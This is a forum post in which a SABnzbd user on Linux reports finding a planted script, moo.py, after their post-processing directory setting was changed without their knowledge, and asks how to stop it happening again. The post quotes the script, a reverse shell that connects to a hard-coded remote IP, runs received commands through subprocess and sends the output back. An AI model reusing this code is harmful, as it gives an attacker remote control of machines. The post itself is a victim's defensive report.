after looking at my successfully downloaded files I noticed the following directories: fu and fu.1 in the downloads area.
both contained a script called moo.py.
In the sabnzbd settings this directory was set as the user-post-processing directory. (not by me)
Both files owned by the user sabnzbd (limited rights).
Running sabnzbd on a Linux server, version 0.7.20
The contents of the file is:
- Code: Select all
HOST = '18.104.22.168' # The remote host
PORT = 4430 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
# send we are connected
s.send('[*] Connection Established!')
# start loop
# recieve shell command
data = s.recv(1024)
# if its quit, then break out and close socket
if data == "quit": break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
# close socket
It does not seem totally harmless to me, nor should it be something installed as part of sabnzbd.
How do I stop this happening in the future, specially the part where my sabnzbd configuration was changed to set the "fu" directory as postprocessing user script directory by something/someone.